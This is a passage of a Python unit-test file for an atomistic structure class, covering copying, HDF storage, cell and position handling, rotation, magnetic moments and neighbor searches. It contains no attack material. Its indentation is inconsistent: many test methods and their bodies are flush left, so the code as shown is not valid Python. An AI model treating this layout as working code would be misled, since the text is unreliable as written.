self.assertIsInstance(self.CO2.convert_element(self.CO2[0]), ChemicalElement)
with self.assertRaises(ValueError):
self.assertIsInstance(self.CO2.convert_element(self.CO2), ChemicalElement)
self.assertEqual(len(self.CO2.species), 2)
def test_copy(self):
    pos, cell = generate_fcc_lattice()
    basis = Atoms(symbols="Al", positions=pos, cell=cell)
    basis_copy = basis.copy()
    # mutating the copy's positions/cell must not touch the original (deep copy)
    basis_copy.positions[0, 0] += 5
    self.assertNotEqual(basis_copy.positions[0, 0], basis.positions[0, 0])
    basis_copy.cell[0, 0] += 5
    self.assertNotEqual(basis_copy.cell[0, 0], basis.cell[0, 0])
    # a fresh copy compares equal to the original ...
    basis_copy = basis.copy()
    self.assertEqual(basis, basis_copy)
    # ... until its chemistry is changed
    basis_copy[:] = "Pt"
    self.assertNotEqual(basis, basis_copy)
def test_numbers_to_elements(self):
    """Atomic numbers 1, 12, 13 and 6 map to H, Mg, Al and C."""
    atomic_numbers = [1, 12, 13, 6]
    symbols = [element.Abbreviation
               for element in self.CO2.numbers_to_elements(atomic_numbers)]
    self.assertTrue(np.array_equal(symbols, ["H", "Mg", "Al", "C"]))
def test_scaled_pos_xyz(self):
basis = Atoms(symbols="AlAl", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3))
pos_xyz = basis.pos_xyz()
self.assertAlmostEqual(np.linalg.norm(pos_xyz[0] - np.array([0, 1])), 0)
scaled_pos_xyz = basis.scaled_pos_xyz()
self.assertAlmostEqual(
np.linalg.norm(pos_xyz[0] - basis.cell[0, 0] * scaled_pos_xyz[0]), 0
)
def test_to_hdf(self):
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"../../static/atomistics/test_hdf",
)
abs_filename = os.path.abspath(filename)
hdf_obj = FileHDFio(abs_filename)
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_repeat([2, 2, 2])
basis.to_hdf(hdf_obj, "test_structure")
self.assertTrue(
np.array_equal(hdf_obj["test_structure/positions"], basis.positions)
)
basis_new = Atoms().from_hdf(hdf_obj, "test_structure")
self.assertEqual(basis, basis_new)
def test_from_hdf(self):
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"../../static/atomistics/test_hdf",
)
abs_filename = os.path.abspath(filename)
hdf_obj = FileHDFio(abs_filename)
pos, cell = generate_fcc_lattice()
basis_store = Atoms(symbols="Al", positions=pos, cell=cell)
basis_store.set_repeat([2, 2, 2])
basis_store.add_tag(selective_dynamics=[False, False, False])
basis_store.selective_dynamics[7] = [True, True, True]
basis_store.to_hdf(hdf_obj, "simple_structure")
basis = Atoms().from_hdf(hdf_obj, group_name="simple_structure")
self.assertEqual(len(basis), 8)
self.assertEqual(basis.get_majority_species()["symbol"], "Al")
self.assertEqual(basis.get_spacegroup()["Number"], 225)
self.assertTrue(basis.selective_dynamics[7][0])
self.assertFalse(basis.selective_dynamics[0][0])
basis.add_tag(selective_dynamics=[False, False, False])
basis.selective_dynamics[6] = [True, True, True]
self.assertTrue(basis.selective_dynamics[6][0])
self.assertFalse(basis.selective_dynamics[5][0])
def test_to_object(self):
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"../../static/atomistics",
)
abs_filename = os.path.abspath(filename)
hdf_obj = ProjectHDFio(
project=Project(abs_filename),
file_name="test.h5"
)
pos, cell = generate_fcc_lattice()
basis_store = Atoms(symbols="Al", positions=pos, cell=cell)
basis_store.set_repeat([2, 2, 2])
basis_store.to_hdf(hdf_obj, "simple_structure")
basis = hdf_obj["simple_structure"].to_object()
self.assertEqual(len(basis), 8)
self.assertEqual(basis.get_majority_species()["symbol"], "Al")
self.assertEqual(basis.get_spacegroup()["Number"], 225)
def test_create_Fe_bcc(self):
self.pse = PeriodicTable()
self.pse.add_element("Fe", "Fe_up", spin="up", pseudo_name="GGA")
self.pse.add_element("Fe", "Fe_down", spin="down", pseudo_name="GGA")
Fe_up = self.pse.element("Fe_up")
Fe_down = self.pse.element("Fe_down")
self.Fe_bcc = Atoms(
[Fe_up, Fe_down],
scaled_positions=[[0, 0, 0], [0.25, 0.25, 0.25]],
cell=np.identity(3),
)
self.Fe_bcc.add_tag("group")
self.Fe_bcc.group[:] = 0
def test_convert_formula(self):
    """convert_formula expands a chemical formula into a flat list of symbols."""
    cases = {
        "C": ["C"],
        "C3": ["C", "C", "C"],
        "CO2": ["C", "O", "O"],
        "CO2Fe": ["C", "O", "O", "Fe"],
        "CO2FeF21": ["C", "O", "O", "Fe", "F", "F"],
    }
    for formula, symbols in cases.items():
        self.assertEqual(self.CO2.convert_formula(formula), symbols)
def test__getitem__(self):
self.assertEqual(self.CO2[0].symbol, "C")
self.assertEqual(self.C3[2].position.tolist(), [0, 2, 0])
self.assertTrue(
(self.C3[1:].positions == np.array([[0, 0, 2], [0, 2, 0]])).all()
)
short_basis = self.CO2[0]
self.assertIsInstance(short_basis, Atom)
short_basis = self.CO2[[0]]
self.assertIsInstance(short_basis, Atoms)
self.assertEqual(short_basis.indices[0], 0)
self.assertEqual(len(short_basis.species), 1)
short_basis = self.CO2[[2]]
self.assertIsInstance(short_basis, Atoms)
self.assertEqual(short_basis.indices[0], 0)
self.assertEqual(len(short_basis.species), 1)
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
basis_O.positions += [0.0, 0.0, 0.5]
basis = basis_Mg + basis_O
basis.center_coordinates_in_unit_cell()
basis.set_repeat([3, 3, 3])
mg_indices = basis.select_index("Mg")
o_indices = basis.select_index("O")
basis_new = basis[mg_indices] + basis[o_indices]
self.assertEqual(
len(basis_new._tag_list), len(basis[mg_indices]) + len(basis[o_indices])
)
self.assertEqual(basis_new.get_spacegroup()["Number"], 225)
self.assertEqual(basis[:-3], basis[0:len(basis)-3])
self.assertEqual(basis.dimension, basis[mg_indices].dimension)
self.assertTrue(np.array_equal(basis.pbc, basis[mg_indices].pbc))
self.assertRaises(IndexError, basis_new.__getitem__, [True, True, False])
self.assertEqual(basis_new, basis_new[[True] * len(basis_new)])
bool_array = np.array([True] * len(basis_new))
bool_array[[10, 20, 40]] = False
self.assertEqual(len(basis_new[bool_array]), len(basis_new) - 3)
bool_array = np.array([True] * len(basis))
bool_array[mg_indices] = False
self.assertEqual(len(basis[bool_array]), len(o_indices))
self.assertEqual(len(basis[0:10]), 10)
self.assertEqual(basis[0, 10], basis[[0, 10]])
def test_positions(self):
self.assertEqual(self.CO2[1:].positions[1:].tolist(), [[0.0, 1.5, 0.0]])
self.CO2.positions[1][0] = 5.0
self.assertEqual(self.CO2.positions[1].tolist(), [5.0, 0, 1.5])
def test_set_positions(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_positions(np.array([[2.5, 2.5, 2.5]]))
self.assertTrue(np.array_equal(basis.positions, [[2.5, 2.5, 2.5]]))
    def test_set_scaled_positions(self):
        """Scaled (fractional) positions round-trip and map to Cartesian via the cell matrix."""
        pos, cell = generate_fcc_lattice()
        basis = Atoms(symbols="Al", positions=pos, cell=cell, a=4.2)
        basis.set_scaled_positions(np.array([[0.5, 0.5, 0.5]]))
        self.assertTrue(np.array_equal(basis.get_scaled_positions(), [[0.5, 0.5, 0.5]]))
        self.assertTrue(
            np.array_equal(basis.positions, np.dot([[0.5, 0.5, 0.5]], basis.cell))
        )
        # The scaled_positions property setter is deprecated; suppress its warning here
        with warnings.catch_warnings(record=True):
            basis.scaled_positions = np.array([[0.5, 0.5, 0.5]])
            self.assertTrue(np.array_equal(basis.scaled_positions, [[0.5, 0.5, 0.5]]))
def test_cell(self):
CO = Atoms(
"CO",
positions=[[0, 0, 0], [0, 0, 2]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]],
pbc=[True, True, True],
)
self.assertTrue((CO.get_cell() == np.identity(3)).all())
self.assertTrue((CO.cell == np.identity(3)).all())
cell = CO.cell.copy()
cell[2][2] = 10.0
CO.set_cell(cell)
self.assertEqual(CO.cell[2, 2], 10.0)
self.assertAlmostEqual(CO.get_volume(), 10)
self.assertAlmostEqual(CO.get_volume(per_atom=True), 0.5 * 10)
CO.set_cell(-np.eye(3))
with self.assertRaises(ValueError):
CO.set_cell([2, 1])
dx = 1.0
r_o = [0, 0, 0]
r_h1 = [dx, 0, 0]
r_h2 = [0, dx, 0]
water = Atoms(elements=['H', 'H', 'O'], positions=[r_h1, r_h2, r_o])
self.assertEqual(water.center_coordinates_in_unit_cell(), water)
water.set_cell(np.zeros((3, 3)))
self.assertTrue(np.array_equal(water.cell, np.zeros((3, 3))))
self.assertTrue(np.array_equal(water.get_scaled_positions(), water.positions))
self.assertEqual(water.center_coordinates_in_unit_cell(), water)
    def test_add(self):
        """Adding atoms/structures must not duplicate species objects for identical elements."""
        COX = self.C2 + Atom("O", position=[0, 0, -2])
        COX += Atom("O", position=[0, 0, -4])
        COX += COX
        n_objects = len(set(COX.get_species_objects()))
        n_species = len(set(COX.get_chemical_elements()))
        self.assertEqual(n_objects, n_species)
    def test_pbc(self):
        """Periodic-boundary flags are stored per axis and can be updated."""
        CO = Atoms(
            "CO",
            positions=[[0, 0, 0], [0, 0, 2]],
            cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]],
            pbc=[True, True, True],
        )
        self.assertTrue((CO.pbc == np.array([True, True, True])).all())
        # NOTE(review): set_pbc result is not asserted — only checks it does not raise
        CO.set_pbc((True, True, False))
    def test_get_masses_DOF(self):
        """Per-degree-of-freedom masses have one entry per Cartesian coordinate (3 * n_atoms)."""
        self.assertEqual(
            len(self.CO2.get_masses_dof()), len(self.CO2.positions.flatten())
        )
    def test_get_center_of_mass(self):
        """Center of mass is the mass-weighted mean position; repetition shifts it accordingly."""
        basis = Atoms(
            elements="AlFe", positions=[3 * [0.5], 3 * [1.5]], cell=2 * np.eye(3)
        )
        mass = np.array(basis.get_masses())
        self.assertAlmostEqual(
            (mass[0] * 0.5 + mass[1] * 1.5) / mass.sum(), basis.get_center_of_mass()[0]
        )
        # 2x repeat of a cell of length 2 shifts the COM by +1 along each axis
        basis.set_repeat(2)
        self.assertAlmostEqual(
            (mass[0] * 0.5 + mass[1] * 1.5) / mass.sum() + 1,
            basis.get_center_of_mass()[0],
        )
    def test_rotate(self):
        """rotate: angle/vector arguments, the 'com'/'cop'/'cou' center options,
        cell co-rotation, and rotating a subset via index_list."""
        unitcell = Atoms(
            elements="AlFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3), pbc=True)
        basis = unitcell.copy()
        # a in degrees, v gives the rotation axis
        basis.rotate(a=10.0, v=[0, 0, 0.1 * np.pi])
        self.assertAlmostEqual(np.arccos(basis.positions[1, :2].sum() / 2) * 180 / np.pi, 10.0)
        basis = unitcell.copy()
        basis.rotate(v=[0, 0, 1], a=0.1)
        self.assertAlmostEqual(np.arccos(basis.positions[1, :2].sum() / 2) * 180 / np.pi, 0.1)
        basis = unitcell.copy()
        # center="com": rotation leaves the center of mass fixed
        center_of_mass = basis.get_center_of_mass()
        basis.rotate(v=[0, 0, 0.1 * np.pi], center="com")
        self.assertTrue(np.allclose(basis.get_center_of_mass(), center_of_mass))
        basis = unitcell.copy()
        # center="cop": center of positions stays fixed
        center_of_positions = basis.positions.mean(axis=0)
        basis.rotate(v=[0, 0, 1], center="cop")
        self.assertTrue(np.allclose(center_of_positions, basis.positions.mean(axis=0)))
        basis = unitcell.copy()
        # center="cou": atom on the rotation axis through the cell corner is unmoved
        position = basis.positions[1]
        basis.rotate(v=[0, 0, 1], center="cou")
        self.assertTrue(np.allclose(position, basis.positions[1]))
        basis = unitcell.copy()
        # rotate_cell=True keeps fractional coordinates invariant
        basis.rotate(v=np.random.random(3), rotate_cell=True)
        self.assertAlmostEqual(basis.get_scaled_positions()[1, 0], 0.5)
        basis = unitcell.copy()
        # Rotating only atom 0 (at the origin) must leave all positions unchanged
        basis.rotate(v=np.random.random(3), index_list=[0])
        self.assertTrue(
            np.allclose(unitcell.positions.flatten(), basis.positions.flatten())
        )
    def test_rotate_euler(self):
        """rotate_euler: phi rotation angle plus the same center options as rotate."""
        unitcell = Atoms(
            elements="AlFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3)
        )
        basis = unitcell.copy()
        basis.rotate_euler(phi=0.1 * np.pi)
        self.assertAlmostEqual(np.arccos(basis.positions[1, :2].sum() / 2) / np.pi, 0.1)
        basis = unitcell.copy()
        center_of_mass = basis.get_center_of_mass()
        basis.rotate_euler(phi=0.1 * np.pi, center="com")
        self.assertTrue(np.allclose(basis.get_center_of_mass(), center_of_mass))
        basis = unitcell.copy()
        center_of_positions = basis.positions.mean(axis=0)
        basis.rotate_euler(phi=0.1 * np.pi, center="cop")
        self.assertTrue(np.allclose(center_of_positions, basis.positions.mean(axis=0)))
        basis = unitcell.copy()
        position = basis.positions[1]
        basis.rotate_euler(phi=0.1 * np.pi, center="cou")
        self.assertTrue(np.allclose(position, basis.positions[1]))
    def test_set_initial_magnetic_moments(self):
        """Magnetic moments accept scalar-per-atom or 3-vector-per-atom shapes; wrong lengths raise."""
        pos, cell = generate_fcc_lattice()
        basis = Atoms(symbols="Al", positions=pos, cell=cell, a=4.2, pbc=True)
        basis *= 2
        basis.set_initial_magnetic_moments(magmoms=np.ones(len(basis)))
        basis = Atoms(symbols="Al", positions=pos, cell=cell, a=4.2, pbc=True)
        basis.set_initial_magnetic_moments(magmoms=np.ones((len(basis), 3)))
        basis = Atoms(symbols="Al", positions=pos, cell=cell, a=4.2, pbc=True)
        basis *= 2
        basis.set_initial_magnetic_moments(magmoms=np.ones(len(basis)))
        self.assertTrue(np.allclose(basis.arrays["initial_magmoms"], np.ones(len(basis))))
        # set new magnetic moments with different shape
        basis.set_initial_magnetic_moments(magmoms=np.ones((len(basis), 3)))
        self.assertTrue(np.allclose(basis.arrays["initial_magmoms"], np.ones((len(basis), 3))))
        # Length mismatch (4 values for 2 atoms) must be rejected
        with self.assertRaises(ValueError):
            basis.set_initial_magnetic_moments(magmoms=np.ones(4))
    def test_get_parent_basis(self):
        """get_parent_basis maps user-defined species (e.g. spin-split O_up/O_down)
        back to their parent chemical elements."""
        periodic_table = PeriodicTable()
        periodic_table.add_element(parent_element="O", new_element="O_up")
        O_up = periodic_table.element("O_up")
        O_basis = Atoms(
            [O_up], cell=10.0 * np.eye(3), scaled_positions=[[0.5, 0.5, 0.5]]
        )
        O_simple = Atoms(
            ["O"], cell=10.0 * np.eye(3), scaled_positions=[[0.5, 0.5, 0.5]]
        )
        O_parent = O_basis.get_parent_basis()
        self.assertNotEqual(O_basis, O_parent)
        self.assertEqual(O_simple, O_parent)
        self.assertEqual(O_parent[0].symbol, "O")
        periodic_table.add_element(parent_element="O", new_element="O_down")
        O_down = periodic_table.element("O_down")
        O_basis = Atoms(
            [O_up, O_down],
            cell=10.0 * np.eye(3),
            scaled_positions=[[0, 0, 0], [0.5, 0.5, 0.5]],
        )
        O_simple = Atoms(
            ["O", "O"], cell=10.0 * np.eye(3), scaled_positions=[[0., 0., 0.], [0.5, 0.5, 0.5]]
        )
        O_parent = O_basis.get_parent_basis()
        self.assertNotEqual(O_basis, O_parent)
        self.assertEqual(O_simple, O_parent)
        self.assertEqual(O_parent.get_chemical_formula(), "O2")
        # Two derived species collapse into a single parent species
        self.assertEqual(len(O_basis.species), 2)
        self.assertEqual(len(O_simple.species), 1)
        self.assertEqual(len(O_parent.species), 1)
    def test_profiling(self):
        """Smoke test: constructing a 1000-atom structure works and preserves the atom count."""
        num = 1000
        C100 = Atoms(num * ["C"], positions=[(0, 0, 0) for _ in range(num)])
        self.assertEqual(len(C100), num)
def test_Au(self):
a = 4.05 # Gold lattice constant
b = a / 2.0
fcc = Atoms(["Au"], cell=[(0, b, b), (b, 0, b), (b, b, 0)], pbc=True)
# print fcc
# print "volume: ", fcc.get_volume()
    def test_set_absolute(self):
        """Scaled positions given at construction time survive a round trip through
        the absolute (Cartesian) representation."""
        a = 4.05  # Gold lattice constant
        b = a / 2.0
        positions = np.array([(0.5, 0.4, 0.0)])
        fcc = Atoms(
            symbols=["Au"],
            scaled_positions=positions,
            cell=[(0, b, b), (b, 0, b), (b, b, 0)],
            pbc=True,
        )
        # fcc.set_absolute()
        # print fcc.positions
        # fcc.set_relative()
        self.assertTrue(np.linalg.norm(fcc.get_scaled_positions() - positions) < 1e-10)
    def test_set_relative(self):
        """set_cell with/without scale_atoms, and the deprecated set_relative /
        set_absolute methods (each must emit exactly one DeprecationWarning)."""
        lattice = CrystalStructure(
            element="Al", bravais_basis="fcc", lattice_constants=4
        )
        # scale_atoms=True: positions scale with the cell change
        basis_relative = lattice.copy()
        cell = basis_relative.cell.copy()
        cell[0, 0] = 6
        basis_relative.set_cell(cell, True)
        # default: positions stay fixed in Cartesian space
        basis_absolute = lattice.copy()
        cell = basis_absolute.cell.copy()
        cell[0, 0] = 6
        basis_absolute.set_cell(cell)
        # cell grew from 4 to 6 along x, hence the factor 1.5
        self.assertAlmostEqual(
            basis_relative.positions[-1, 0] * 1.5, basis_absolute.positions[-1, 0]
        )
        basis = lattice.copy()
        self.assertAlmostEqual(
            basis.get_scaled_positions(wrap=False)[-1, 0],
            basis_relative.get_scaled_positions(wrap=False)[-1, 0],
        )
        cell = basis.cell.copy()
        cell[0, 0] = 6
        basis.set_cell(cell)
        self.assertAlmostEqual(basis.positions[-1, 0], basis_absolute.positions[-1, 0])
        basis = lattice.copy()
        basis_relative = lattice.copy()
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            basis_relative.set_relative()
            self.assertEqual(len(w), 1)
            self.assertIsInstance(w[-1].message, DeprecationWarning)
        basis.positions[-1, 0] = 0.5
        basis_relative.positions[-1, 0] = 0.5
        self.assertAlmostEqual(basis.positions[-1, 0], basis_relative.positions[-1, 0])
        # Cell given as 3 lengths -> orthorhombic box
        basis.set_cell(3 * np.ones(3))
        self.assertAlmostEqual(basis.get_volume(), 27)
        # Cell given as 3 lengths + 3 angles (slightly below 90 deg shrinks the volume)
        basis.set_cell(np.append(np.ones(3), 90 - np.random.random(3)).flatten())
        self.assertLess(basis.get_volume(), 1)
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            basis_absolute.set_absolute()
            self.assertEqual(len(w), 1)
            self.assertIsInstance(w[-1].message, DeprecationWarning)
def test_repeat(self):
basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
basis_O.set_scaled_positions(basis_O.get_scaled_positions() + [0.0, 0.0, 0.5])
with self.assertRaises(ValueError):
basis_O.set_repeat(5.0)
with self.assertRaises(AssertionError):
basis_O.set_repeat([2, 2])
basis = basis_Mg + basis_O
basis.center_coordinates_in_unit_cell()
basis.add_tag(selective_dynamics=[True, True, True])
basis.selective_dynamics[basis.select_index("O")] = [False, False, False]
len_before = len(basis)
sel_dyn_before = np.array(basis.selective_dynamics.list())
self.assertTrue(
np.alltrue(
np.logical_not(
np.alltrue(sel_dyn_before[basis.select_index("O")], axis=1)
)
)
)
self.assertTrue(
np.alltrue(np.alltrue(sel_dyn_before[basis.select_index("Mg")], axis=1))
)
basis.set_repeat([3, 3, 2])
sel_dyn_after = np.array(basis.selective_dynamics.list())
len_after = len(basis)
self.assertEqual(basis.get_spacegroup()["Number"], 225)
self.assertEqual(len_before * 18, len_after)
self.assertEqual(len(sel_dyn_before) * 18, len(sel_dyn_after))
self.assertTrue(
np.alltrue(
np.logical_not(
np.alltrue(sel_dyn_after[basis.select_index("O")], axis=1)
)
)
)
self.assertTrue(
np.alltrue(np.alltrue(sel_dyn_after[basis.select_index("Mg")], axis=1))
)
basis = basis_Mg + basis_O
basis.add_tag(spin=None)
basis.spin[basis.select_index("Mg")] = 1
basis.spin[basis.select_index("O")] = -1
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("Mg")].list(),
1 * np.ones(len(basis.select_index("Mg"))),
)
)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("O")].list(),
-1 * np.ones(len(basis.select_index("O"))),
)
)
basis.set_repeat(2)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("Mg")].list(),
1 * np.ones(len(basis.select_index("Mg"))),
)
)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("O")].list(),
-1 * np.ones(len(basis.select_index("O"))),
)
)
basis = basis_Mg + basis_O
basis.add_tag(spin=None)
# Indices set as int
Mg_indices = np.array(basis.select_index("Mg"), dtype=int).tolist()
for ind in Mg_indices:
basis.spin[ind] = 1
O_indices = np.array(basis.select_index("O"), dtype=int).tolist()
for ind in O_indices:
basis.spin[ind] = -1
basis.set_repeat(2)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("Mg")].list(),
1 * np.ones(len(basis.select_index("Mg"))),
)
)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("O")].list(),
-1 * np.ones(len(basis.select_index("O"))),
)
)
# Indices set as numpy.int
Mg_indices = np.array(basis.select_index("Mg"), dtype=np.int)
for ind in Mg_indices:
basis.spin[ind] = 1
O_indices = np.array(basis.select_index("O"), dtype=np.int)
for ind in O_indices:
basis.spin[ind] = -1
basis.set_repeat(2)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("Mg")].list(),
1 * np.ones(len(basis.select_index("Mg"))),
)
)
self.assertTrue(
np.array_equal(
basis.spin[basis.select_index("O")].list(),
-1 * np.ones(len(basis.select_index("O"))),
)
)
self.assertEqual(8 * len(self.CO2), len(self.CO2.repeat(np.int64(2))))
    def test_get_distance(self):
        """get_distance accepts atom indices or raw coordinates in any combination."""
        cell = 2.2 * np.identity(3)
        NaCl = Atoms("NaCl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
        # index-to-index: half the body diagonal of the 2.2 cube
        self.assertAlmostEqual(NaCl.get_distance(0, 1), 2.2 * 0.5 * np.sqrt(3))
        self.assertAlmostEqual(NaCl.get_distance(0, [0, 0, 0.5]), 0.5)
        self.assertAlmostEqual(NaCl.get_distance([0, 0, 0], [0, 0, 0.5]), 0.5)
    def test_find_neighbors_by_vector(self):
        """Each atom has exactly one neighbor along a given vector, so every id
        appears the same number of times in the result."""
        basis = Atoms(symbols=2*["Fe"],
                      scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)],
                      cell=np.identity(3),
                      pbc=True)
        id_lst = basis.find_neighbors_by_vector([0, 0, 1],
                                                num_neighbors=14)
        self.assertEqual(len(np.unique(np.unique(id_lst, return_counts=True)[1])), 1)
    def test_get_neighborhood(self):
        """get_neighborhood of an arbitrary point reports the distance to the closest atom."""
        basis = Atoms(
            "FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3), pbc=True
        )
        neigh = basis.get_neighborhood([0, 0, 0.1])
        self.assertEqual(neigh.distances[0], 0.1)
    def test_get_neighbors(self):
        """Neighbor shells of bcc Fe, partial periodicity, and width_buffer handling."""
        basis = Atoms(symbols="FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3), pbc=True)
        neigh = basis.get_neighbors(num_neighbors=58)
        # bcc nearest-neighbor distance is sqrt(3)*a/2 with a=2
        self.assertAlmostEqual(neigh.distances[0][0], np.sqrt(3))
        counts = np.unique(neigh.shells[0], return_counts=True)
        # First five bcc shells have 8, 6, 12, 24, 8 members
        self.assertTrue(np.array_equal(counts[0], np.arange(5)+1))
        self.assertTrue(np.array_equal(counts[1], np.array([ 8,  6, 12, 24,  8])))
        # Periodicity only along x changes the distance spectrum
        basis = Atoms(symbols="FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3), pbc=True)
        basis.pbc = np.array([True, False, False])
        neigh = basis.get_neighbors(num_neighbors=10)
        self.assertAlmostEqual(neigh.distances[0][0], np.sqrt(3))
        self.assertAlmostEqual(neigh.distances[0][2], 2)
        self.assertAlmostEqual(neigh.distances[0][4], np.sqrt(11))
        self.assertAlmostEqual(neigh.distances[0][6], 4)
        self.assertAlmostEqual(neigh.distances[0][8], np.sqrt(27))
        basis.pbc = True
        basis.set_repeat(2)
        # A tiny width_buffer should warn; too small combined with many neighbors raises
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            neigh = basis.get_neighbors(width_buffer=0.1)
            self.assertGreaterEqual(len(w), 1)
        with self.assertRaises(ValueError):
            neigh = basis.get_neighbors(width_buffer=0.001, num_neighbors=100)
        # Non-periodic structure: asking for a single neighbor must still work
        basis = Atoms(symbols="FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3))
        neigh = basis.get_neighbors(num_neighbors=1)
    def test_get_neighbors_by_distance(self):
        """Cutoff-radius neighbor search: per-atom counts, truncation by
        num_neighbors (with warning), and ragged/empty results in sparse cells."""
        basis = Atoms(symbols="FeFeFe", positions=[3 * [0], 3 * [1], [0, 0, 1]], cell=2 * np.eye(3), pbc=True)
        neigh = basis.get_neighbors_by_distance(1.5)
        self.assertEqual(len(neigh.distances[0]), 2)
        self.assertEqual(len(neigh.distances[1]), 4)
        self.assertEqual(len(neigh.distances[2]), 6)
        self.assertEqual(neigh.distances[0][0], 1.)
        self.assertAlmostEqual(neigh.distances[1][0], np.sqrt(2))
        self.assertEqual(neigh.distances[2][0], 1.)
        # num_neighbors smaller than the actual count triggers a warning and truncates
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            neigh = basis.get_neighbors_by_distance(cutoff_radius=1.5, num_neighbors=5)
            self.assertGreaterEqual(len(w), 1)
            self.assertEqual(len(neigh.distances[2]), 5)
        with self.assertRaises(ValueError):
            basis.get_neighbors_by_distance(width_buffer=-1)
        # Check with large cell with few atoms
        dx = 0.7
        r_O = [0, 0, 0]
        r_H1 = [dx, dx, 0]
        r_H2 = [-dx, dx, 0]
        unit_cell = 10 * np.eye(3)
        water = Atoms(elements=['H', 'H', 'O'], positions=[r_H1, r_H2, r_O], cell=unit_cell, pbc=True)
        # Ragged per-atom neighbor lists come back as a plain list, not an array
        self.assertIsInstance(water.get_neighbors_by_distance(1.3).indices, list)
        # Two isolated H atoms: no neighbors within the cutoff
        water_new = water[[0, 1]]
        self.assertTrue(np.array_equal(water_new.get_neighbors_by_distance(1.3).indices, [np.array([]), np.array([])]))
    def test_get_number_of_neighbors_in_sphere(self):
        """Per-atom neighbor counts within a cutoff sphere, including the
        num_neighbors truncation warning and invalid width_buffer."""
        basis = Atoms(symbols="FeFeFe", positions=[3 * [0], 3 * [1], [0, 0, 1]], cell=2 * np.eye(3), pbc=True)
        num_neighbors_per_atom = basis.get_numbers_of_neighbors_in_sphere(cutoff_radius=2,
                                                                          width_buffer=0)
        self.assertEqual(num_neighbors_per_atom[0], 10)
        self.assertEqual(num_neighbors_per_atom[1], 12)
        self.assertEqual(num_neighbors_per_atom[2], 6)
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            num_neighbors_per_atom = basis.get_numbers_of_neighbors_in_sphere(cutoff_radius=1.5, num_neighbors=5)
            self.assertGreaterEqual(len(w), 1)
            self.assertEqual(num_neighbors_per_atom[2], 5)
        with self.assertRaises(ValueError):
            basis.get_numbers_of_neighbors_in_sphere(width_buffer=-1)
    def test_get_shell_matrix(self):
        """Structure-level get_shell_matrix agrees with the one computed from the neighbor object."""
        structure = CrystalStructure(elements='Fe', lattice_constants=2.83, bravais_basis='bcc')
        shell_mat_atoms = structure.get_shell_matrix(num_neighbors=8)
        neigh = structure.get_neighbors(num_neighbors=8)
        self.assertEqual(shell_mat_atoms[0].sum(), neigh.get_shell_matrix()[0].sum())
def test_center_coordinates(self):
cell = 2.2 * np.identity(3)
NaCl = Atoms("NaCl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
NaCl.set_repeat([3, 3, 3])
NaCl.positions += [2.2, 2.2, 2.2]
NaCl.center_coordinates_in_unit_cell(origin=-0.5)
self.assertTrue(-0.5 <= np.min(NaCl.get_scaled_positions()))
self.assertTrue(np.max(NaCl.get_scaled_positions() < 0.5))
NaCl.center_coordinates_in_unit_cell(origin=0.0)
self.assertTrue(0 <= np.min(NaCl.positions))
self.assertTrue(np.max(NaCl.get_scaled_positions() < 1))
@unittest.skip("skip ovito because it is not installed in the test environment")
def test_analyse_ovito_cna_adaptive(self):
basis = Atoms(
"FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
)
basis.analyse_ovito_cna_adaptive()["CommonNeighborAnalysis.counts.BCC"] == 2
    @unittest.skip("skip ovito because it is not installed in the test environment")
    def test_analyse_ovito_centro_symmetry(self):
        """Centro-symmetry parameter via ovito for a 2-atom bcc cell."""
        basis = Atoms(
            "FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
        )
        self.assertTrue(
            all(basis.analyse_ovito_centro_symmetry() == np.array([0.75, 0.75]))
        )
@unittest.skip("skip ovito because it is not installed in the test environment")
def test_analyse_ovito_voronoi_volume(self):
basis = Atoms(
"FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
)
self.assertTrue(
all(basis.analyse_ovito_centro_symmetry() == np.array([0.5, 0.5]))
)
    @unittest.skip("skip nglview because it is not installed in the test environment")
    def test_plot3d(self):
        """Smoke test: default (nglview) 3D visualization does not raise."""
        basis = Atoms(
            "FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
        )
        view = basis.plot3d()
    @staticmethod
    def test_plot3d_plotly():
        """Smoke test: plotly visualization backend does not raise."""
        basis = Atoms(
